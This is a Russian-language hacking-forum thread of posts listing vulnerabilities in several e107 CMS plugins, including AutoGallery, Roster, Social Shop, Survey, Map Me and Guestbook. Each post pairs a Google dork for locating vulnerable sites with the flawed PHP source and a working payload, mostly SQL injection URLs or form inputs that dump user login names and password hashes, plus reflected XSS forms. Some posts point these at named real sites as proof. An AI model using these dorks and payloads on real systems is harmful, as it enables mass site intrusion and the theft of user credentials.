Старый 06.07.2010, 19:20   #31
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

AutoGallery v3.1_beta
[скачано]

в гугле:

inurl:e107_plugins/autogallery

Результаты 1 - 10 из примерно 132 000

путь в информации!
http://e107/e107_plugins/autogallery/help.php
Цитата:
Z:\home\e107\www\e107_plugins\autogallery\Gallery
пути (бес параметров запрос послать!):
http://e107/e107_plugins/autogallery/xmlplaylist.php
http://e107/e107_plugins/autogallery/editaction.php

пассивная XSS
e107_plugins/autogallery/arcade.php
PHP код:
....
// Do different things when the flash game gives different requests
$sessdo $_POST['sessdo'];

if (
$sessdo != ''

    
// Session start to get the game name - $title
    
$microone $_POST['microone'];
    
$score $_POST['score'];
    
$gametime $_POST['gametime'];
    
    
// Keep feeding that flash!
    
switch($sessdo
    { 
        case 
'sessionstart'
            
// Give it some random crap it doesn't really need (the initbar figure and lastid)
            
echo "&connStatus=1&gametime=$gametime&initbar=6Z4&lastid=6&val=x"
            exit; 
            break;
    
         
// Give it permission for... no apparent reason
        
case 'permrequest':
            
// Notice $microone = $score;  -__VERY IMPORTANT__
            
$microone $score;
            echo 
"&validate=1&microone=$microone";
            exit;
            break; ... 
target:
Цитата:
http://[host]/[path]/e107_plugins/autogallery/arcade.php
Result (шлем POST!):
sessdo=sessionstart
gametime=<script>alert(/XSS/)</script>
или
sessdo=permrequest
microone=<script>alert(/XSS/)</script>

<form action="http://[host]/[path]/e107_plugins/autogallery/arcade.php" method="POST">
<input type=text name=sessdo value=sessionstart><br>
<input type=text name=gametime value='<script>alert(/XSS/)</script>'><br>
<input type=submit value=Отправить>
</form>
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:21   #32
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

aa_meetings v1.1
[скачать]

SQL inj
/e107_plugins/aa_meetings/geocode.php
PHP код:
...// Select all the rows in the markers table
$query "SELECT * FROM ".MPREFIX."aam_meetings WHERE 1";
if (
$_GET['MeetingID']) $query .= " and MeetingID=".$_GET['MeetingID'];
else 
$query .= " and (Lat is null or Lng is null)";
$result mysql_query($query);
if (!
$result) {
  die(
"Invalid query: " mysql_error());
}... 
Result:
http://ovdpohe.sk/e107_plugins/aa_me...29%29%29x%29--
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:22   #33
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Roster by Carl Taylor Version 2.0
гугл- inurl:/e107_plugins/roster

Blind SQL inj

[path]/e107_plugins/roster/userinfo.php
PHP код:
...
//html file
require_once("html/roster_userinfo.php");
$html = new userinfo_html;

switch(
$_GET['action']){
    default:
        
$text $html->uinfo_show($_GET['m_id']);
}... 
[path]/e107_plugins/roster/html/roster_userinfo.php
PHP код:
...
Class 
userinfo_html {

    function 
uinfo_show($m_id) {
    global 
$sql;

        
// get the member
        
$member_q $sql->db_Select("roster_members""*""roster_member_id='".$m_id."'");
        
$member_a $sql->db_Fetch(MYSQL_ASSOC);
        
$rank explode(","$member_a['roster_member_rank']);
              
$enlisted date("dMY"$member_a['roster_member_enlisted']);
              
$enlisted strtoupper($enlisted);
              
$patterns[0] = "/JUN/";
              
$patterns[1] = "/JUL/";... 
[path]/e107_handlers/mysql.class.php
PHP код:
...function db_Select($table$fields '*'$arg ''$mode 'default'$debug FALSE$log_type ''$log_remark '') {
        global 
$db_mySQLQueryCount;
        
$table $this->db_IsLang($table);
        
$this->mySQLcurTable $table;
        if (
$arg != '' && $mode == 'default')
        {
            if (
$this->mySQLresult $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' WHERE '.$argNULL'db_Select'$debug$log_type$log_remark)) {
                
$this->dbError('dbQuery');
                return 
$this->db_Rows();
            } else {
                 
$this->dbError("db_Select (SELECT $fields FROM ".MPREFIX."{$table} WHERE {$arg})");
                return 
FALSE;
            }
        } elseif (
$arg != '' && $mode != 'default') {
            if (
$this->mySQLresult $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' '.$argNULL'db_Select'$debug$log_type$log_remark)) {
                
$this->dbError('dbQuery');
                return 
$this->db_Rows();
            } else {
                  
$this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table} {$arg})");
                return 
FALSE;
            }
        } else {
            if (
$this->mySQLresult $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$tableNULL'db_Select'$debug$log_type$log_remark)) {
                 
$this->dbError('dbQuery');
                return 
$this->db_Rows();
            } else {
                 
$this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table})");
                return 
FALSE;
            }
        }
    }... 
PHP код:
...function dbError($from) {
        if (
$error_message = @mysql_error()) {
            if (
$this->mySQLerror == TRUE) {
                
message_handler('ADMIN_MESSAGE''<b>mySQL Error!</b> Function: '.$from.'. ['.@mysql_errno().' - '.$error_message.']'__LINE____FILE__);
                return 
$error_message;
            }
        }
    }... 
К сожелению ошибки от СУБД отключены:
PHP код:
function db_Connect($mySQLserver$mySQLuser,$mySQLpassword$mySQLdefaultdb)
...
$this->mySQLerror FALSE;
... 
Result:
http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)= 5--+
Контент выводится!

http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)= 4--+
Контент не выводится!

Условие: mg=off

roster_sql.php - в скрипте структура єтого плагина бес дескрипторов!
путь - http://[host]/[path]/e107_plugins/roster/log/userclass2.php

Я обписался ):
не блинд, а иньекция c принтабельными!
SQL inj
гуглinurl:/e107_plugins/roster
Цитата:
http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=-1'+union+select+1,2,3,4,5,6,7,8,user_password,10,1 1,12,13,14,15,16,user_loginname,18+from+e107_user--+
Условие: mg=off

А вот и доказательства:
http://www.10thsfg.org/e107_plugins/...m+e107_user--+
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:23   #34
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Social Shop v1.1 by eleljrk
cкачать

гугл inurl:e107_plugins/social_shop/

SQL inj
[path]/e107_plugins/social_shop/shop.php
PHP код:
...elseif($_GET['product']) {
    
$storedb->db_Select("ss_products","*""product_id='".$_GET['product']."'");
    while(
$store_row $storedb -> db_Fetch()) {
        if(
$store_row['product_approve'] == && !ADMIN) {
            
$ns->tablerender(SS_ERROR "<div align='center'>".SS_ERRORMASSAGE."<a href='".e_SELF."?page=home'>".$pref['ss_store_name']."</a></div>".$credits);
            require_once(
FOOTERF);
            exit;
        }
        else {
            
$store_user get_user_data($store_row['product_releaser']);
            
$filesize round((filesize("store/".$store_row['product_product']) / 1024));
            
$product_description str_replace("\n" ,"<br />" $store_row['product_description']);        
            
$store... 
Результат:
http://[host]/[path]/e107_plugins/social_shop/shop.php?product=-1'+union+select+1,concat_ws(0x3a,user_loginname,us er_password),3,4,5,6,7,8,9,10,11,12,13,14+from+e10 7_user--+

Условие: mg=off
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:23   #35
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Survey_46.zip v0.47 by yvalni
скачать
гугл- inurl:e107_plugins/survey
Результаты 1 - 10 из примерно 7 430

SQL inj
[path]/e107_plugins/survey/survey.php
PHP код:
...if($_POST['submit']){
    
$cnv = new convert;
    
$mailto_addresses "";
    
$submit_time time();
    
$mailtext LAN_SUR42.": ".$cnv -> convert_date($submit_time,"long")."\n\n";

    
$sql -> db_Select("survey","*","survey_id='{$_POST['survey_id']}' ");
    if(
$row $sql -> db_Fetch()){
        
extract($row);
    }
    if(
$survey_class != e_UC_PUBLIC && $survey_once){
        if(
already_voted($survey_user)){
            
$ns -> tablerender("Error - {$survey_name}",LAN_SUR2);
            require_once(
FOOTERF);
            exit;
        }
    }... 
Самое интересное что survey_id можно и не знать,
данные вместе с ошибкой вылазят (есть принтабельное поле!)

Результат:
<form action="http://[host]/[path]/e107_plugins/survey/survey.php" method=post>
<input type=text name=survey_id value="-2' union select 1,concat_ws(0x3a,user_loginname,user_password ),3,4,5,6,7,8,9,10,11,12,13,14 from e107_user limit 0,1-- ">
<input type=submit name=submit>
</form>

Условие: mg=off
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:24   #36
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Registration v0.9 by holiday
скачать
SQL inj в order by (есть вывод от СУБД!)

гугл- inurl:e107_plugins/registration

[path]/e107_plugins/registration/playerlist.php[/COLOR]
PHP код:
require_once("../../class2.php");
//@include_once e_PLUGIN.'registration/languages/'.e_LANGUAGE.'.php';
@include_once e_PLUGIN.'registration/languages/Deutsch.php';


require_once(
"cRegistration.php");


require_once(
HEADERF);
 
$title=sprintf("%s - %s",REG_MAIN_2cTournament::getInstance()->getActualTournament() );
$ns->tablerender($titlecRegistration::getInstance()->showRegisteredUser($_REQUEST['order']));


require_once(
FOOTERF); 
[path]/e107_plugins/registration/Cregistration.php
PHP код:
....public function showRegisteredUser($order=""){
        
        
$config cConfig::getInstance()->getConfiguration();
        
$data=$this->getAllParcipitants($order);
        
        
        
$border=sprintf("border:0;border-bottom: #444 1px solid;");
        
$padding1=sprintf("padding-right: 1em");
        
$table.=sprintf("<table align=left style='width:95%%;margin-left:10px;border-collapse:collapse;%s; background:none;'>",$border);
        
        
        
$table.=sprintf("<tr>");... 
PHP код:
...protected function getAllParcipitants($order){
        
        try {
            
        
            global 
$tp$sql;
            
            
//reihenfolge wird immer durch Name, Vornamen ergдnzt
            
if(empty($order))$order="reg_name, reg_vorname";
            else     
$order.=', reg_name, reg_vorname';
            
$data=array();
            
            
$this->debug("DB select {$this->table}");
            
$tid=cTournament::getInstance()->getActualTournamentId();
            
            
$result=$sql->db_Select("teilnehmer""*" "WHERE reg_tournamentId=$tid ORDER BY $order """);
            
            if(!
$result) {
                    
$error=sprintf("DB Error %s: %s"mysql_errno(), mysql_error());
                    if(
mysql_errno()>0) throw new Exception ($error);
                    
$this->debug("Kein Datenbankeintrag gefunden");    
                }    
                
            
            
//$teilnehmer=array();
            
while($row $sql->db_Fetch())    {    
                    ... 
Результат:
http://[host]/[path]/e107_plugins/registration/playerlist.php?order=1,(select 1 from (select count(0),concat_ws(0x3a,(select user_loginname from e107_user limit 0,1),(select user_password from e107_user limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a)

ps
1) лучше постом крутить!
2) http://[host]/[path]/e107_plugins/registration_sql.php - структура плагина!
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:24   #37
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Map Me! v1.3 by rickey911
скачать
SQL inj

гугл- inurl:/e107_plugins/mapme

[path]/e107_plugins/mapme/mapmejs.php
PHP код:
...require_once("../../class2.php");
    
  
// Get language file (assume that the English language file is always present)
  
$lan_file e_PLUGIN."mapme/languages/".e_LANGUAGE.".php";
  
include_lan($lan_file);
    
    
header("Content-type: application/x-javascript");
    
    global 
$pref$user;
    
$uid $_GET['u'];
    
$sql->mySQLresult = @mysql_query("SELECT ".MPREFIX."gmarkers.loc, ".MPREFIX."gmarkers.lat, ".MPREFIX."gmarkers.lng, ".MPREFIX."user.user_name, ".MPREFIX."user.user_image FROM `".MPREFIX."gmarkers`, ".MPREFIX."user where ".MPREFIX."gmarkers.user_id = ".$uid." and ".MPREFIX."gmarkers.user_id = ".MPREFIX."user.user_id");
$rows=$sql->db_Rows();
    if(
$rows){
         
$row $sql->db_Fetch();
        if(
$row['user_image']){
            require_once(
e_HANDLER."avatar_handler.php");
            
$uimage "<img src='".avatar($row['user_image'])."' alt='".$row['user_name']."' style='text-align:middle'  />";
        }
        else{
            
$uimage "<img src='".e_PLUGIN."mapme/images/noavatar.gif' alt='".$row['user_name']."' style='text-align:middle' />";
        }

        
$html "\"<div style='width:250px;'><div style='float:left; text-align:left;'>".$uimage."</div><div style='float:left; text-align:left;'><a href='".e_BASE."user.php?id.".$uid."' title='".$row['user_name']."'><b>".$row['user_name']."</b></a><br>".MAPME_JS_001." ".$row['user_name']." ".MAPME_JS_002." ".$row['loc'].".";
        if(
$uid==USERID){
            
$html .="<br><br><span class='smalltext'><a href='".e_PLUGIN_ABS."mapme/mapconfig.php'>".MAPME_JS_003."</a></span>"// bugfix by nlstart
        
}
... 
Результат и никаких условий:

http://[host]/[path]/e107_plugins/mapme/mapmejs.php?u=-1+union+select+1,2,3,concat_ws(0x3a,user_loginname ,user_password),5+from+e107_user--+
Strilo4ka вне форума   Ответить с цитированием
Старый 06.07.2010, 19:25   #38
Strilo4ka
Banned
 
Регистрация: 05.07.2010
Сообщений: 55
Репутация: 13
По умолчанию

Tabbed Menu v2.0 by KVN
скачать
inurl:e107_plugins/tabbed_menu
пасивная XSS
Код:
http://[host]/[path]/e107_plugins/tabbed_menu/ajaxhandler.php?target=<script>alert(123)</script>
[path]/e107_plugins/tabbed_menu/ajaxhandler.php
PHP код:
...}else{
    
$ajax_response "<menu_name>{$_GET['target']}</menu_name><source_id>$ajax_source</source_id><arg>$ajax_arg</arg> <b>No Data Available</b>";
}
echo 
$ajax_response
путь:
Код:
http://[host]/[path]/e107_plugins/tabbed_menu/ajaxhandler.php?source=1
Strilo4ka вне форума   Ответить с цитированием
Старый 07.07.2010, 23:07   #39
The matrix
 
Аватар для The matrix
 
Регистрация: 05.07.2010
Сообщений: 39
Репутация: 46
По умолчанию plugin Guestbook

Plugin name: plugin Guestbook
Site:http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.608
google dork:inurl:"/e107_plugins/guestbook/guestbook.php"
Type:SQL-INJ в INSERT
VERSION: 4.01(Возможно И версии <==4.01)
Need:mq=off

/e107_plugins/guestbook/guestbook.php
PHP код:
    $_POST['url']     = eregi_replace("http://"""trim($_POST['url']));
    
$_POST['url']     = ($_POST['url']?"http://".$_POST['url']:"");
...............................
if(
$sql -> db_Insert("guestbook""'', '".$_POST['name']."', '".$_POST['email']."', '".$_POST['url']."', '$time', '$ip', '$host', '".$_POST['comment']."', '".USERID."', '".$admincheck."' ")){
// $_POST['url'] не обрабатывается должным образом и попадает в запрос 
3xpl01t:
в поле website вбиваем
Код:
chupa-chups', 1,1,(select concat(user_name,0x3a,user_password) from e107_user where user_id=1),1,1,1)#
end
The matrix вне форума   Ответить с цитированием
Старый 09.07.2010, 14:37   #40
The matrix
 
Аватар для The matrix
 
Регистрация: 05.07.2010
Сообщений: 39
Репутация: 46
По умолчанию Plugin: AACGC Game List

Plugin name: AACGC Game List
Site:http://plugins.e107.org/e107_plugins...p?artifact.760
google dork:inurl:"e107_plugins/aacgc_gamelist"
Type:SQL-INJ
VERSION: 3.1(Возможно И версии <==3.1)
Need:Нет зависимостей
/e107_plugins/aacgc_gamelist/AddMe.php
PHP код:
......................
require_once(
"../../class2.php");
require_once(
HEADERF);
if (
e_QUERY) {
        
$tmp explode('.'e_QUERY);
        
$action $tmp[0];
        
$sub_action $tmp[1];
        
$id $tmp[2];
        unset(
$tmp);
}
$sql->db_Select("aacgc_gamelist""*""WHERE game_id = $sub_action","");
$row $sql->db_Fetch();
$sql2 = new db;
$sql2->db_Select("aacgc_gamelist_members""*""WHERE chosen_game_id=".$row['game_id']."","");
$row2 $sql2->db_Fetch();
........................ 
3xplo1t:
Код:
http://localhost/e107.2/e107_plugins/aacgc_gamelist/AddMe.php?blabla.-1%20union%20select%20null,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user#2
нельзя использовать "+" в запросе можно только "пробел".
The matrix вне форума   Ответить с цитированием
Ответ

Метки
e107 cms, e107 cms vulnerabilities, уязвимости e107 cms

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot